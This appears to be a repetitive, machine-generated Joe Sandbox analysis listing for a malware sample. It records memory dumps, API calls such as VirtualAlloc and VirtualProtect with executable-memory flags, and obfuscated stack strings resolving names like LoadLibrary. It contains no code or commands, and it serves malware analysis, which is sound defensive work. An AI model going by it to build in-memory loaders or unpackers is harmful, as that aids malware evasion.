                                • API ID: ProtectVirtual
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 544645111-4069139063
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-29643960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$S$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-29643960
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: HP<3$KCA2$P5BE
                                • API String ID: 544645111-96660345
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: HP<3$P5BE
                                • API String ID: 544645111-576570839
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: KCA2
                                • API String ID: 544645111-1043864701
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: BB4L
                                • API String ID: 544645111-2802313288
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: KCA2
                                • API String ID: 544645111-1043864701
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: BCG9
                                • API String ID: 544645111-2193108473
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00414407
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0041E720
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00414407
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00414407
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041D1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: E$P$R$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-774868400
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-4069139063
                                APIs
                                • VirtualProtect.KERNELBASE(00000000,?,00000040,?,?,?,?,?,?,?,?,?,?,02952B80,02952B24,00000000), ref: 029530BB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726854896.0000000002950000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2950000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-399585960
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
